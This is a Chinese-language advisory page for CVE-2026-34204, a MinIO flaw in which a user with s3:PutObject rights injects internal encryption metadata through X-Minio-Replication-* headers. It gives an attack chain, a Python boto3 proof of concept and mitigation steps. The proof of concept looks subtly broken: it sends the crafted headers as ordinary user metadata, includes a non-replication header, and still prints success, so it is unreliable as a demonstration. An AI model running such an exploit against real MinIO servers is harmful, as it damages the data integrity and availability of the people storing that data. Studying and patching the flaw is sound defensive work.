CVE-2026-34204 CVSS 7.1 高危

CVE-2026-34204 MinIO 元数据注入漏洞

披露日期: 2026-03-31

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-34204

漏洞类型

元数据注入

CVSS评分

7.1 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

MinIO

漏洞概述

MinIO是一个高性能对象存储系统。在RELEASE.2026-03-26T21-24-40Z版本之前，extractMetadataFromMime()函数存在安全缺陷。该漏洞允许任何拥有s3:PutObject权限的认证用户，利用精心构造的X-Minio-Replication-*请求头，在普通的PutObject操作中注入内部服务器端加密元数据。攻击者可借此篡改对象的关键元数据，可能导致数据完整性受损或服务不可用。官方已在RELEASE.2026-03-26T21-24-40Z版本中修复此问题。

技术细节

该漏洞的根源在于MinIO服务器端处理对象元数据时的逻辑缺陷。具体来说，extractMetadataFromMime()函数在解析MIME类型或相关元数据时，未对用户传入的X-Minio-Replication-*系列请求头进行充分的合法性校验。在正常的业务逻辑中，这类头部通常由内部服务间通信使用，用于控制复制或加密策略，不应由外部客户端直接指定。攻击者利用s3:PutObject这一基础权限，通过发送带有恶意构造的X-Minio-Replication-*头的PUT请求，欺骗服务器接受非法的内部加密元数据。这种注入可能导致对象被错误的加密配置锁定（影响可用性），或者绕过既定的数据完整性校验（影响完整性）。由于漏洞利用仅需低权限账号且无需用户交互，其攻击门槛较低，危害性较高。

攻击链分析

STEP 1

侦察

攻击者识别目标MinIO实例，并确认其版本低于RELEASE.2026-03-26T21-24-40Z。

STEP 2

获取权限

攻击者获取一个具有s3:PutObject权限的低权限账户凭证。

STEP 3

漏洞利用

攻击者向目标桶发送PutObject请求，并在HTTP头中注入恶意的X-Minio-Replication-*字段。

STEP 4

达成影响

服务器接受并处理了恶意元数据，导致对象加密状态被篡改，引发完整性破坏或拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import boto3
from botocore.client import Config

# CVE-2026-34204 PoC
# Exploit: Inject internal metadata via X-Minio-Replication headers

s3 = boto3.client('s3',
                  endpoint_url='http://<target-minio>:9000',
                  aws_access_key_id='<access_key>',
                  aws_secret_access_key='<secret_key>')

bucket_name = 'test-bucket'
object_key = 'exploit-test.txt'

# Craft the malicious headers
# The vulnerability lies in processing X-Minio-Replication-* headers
headers = {
    'X-Minio-Replication-Request': 'true',
    'X-Minio-Internal-Encryption-Key': 'malicious-key-id'
}

try:
    # PutObject with injected headers
    s3.put_object(Bucket=bucket_name,
                  Key=object_key,
                  Body='PoC content',
                  Metadata=headers)
    print(f"[+] Successfully injected metadata into {object_key}")
except Exception as e:
    print(f"[-] Exploit failed: {e}")

影响范围

MinIO < RELEASE.2026-03-26T21-24-40Z

防御指南

临时缓解措施

建议立即升级至修复版本。若无法立即升级，请严格审查并限制具有s3:PutObject权限的用户账户，并在网络边界部署规则，检测并阻断包含X-Minio-Replication-*字段的异常PUT请求。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表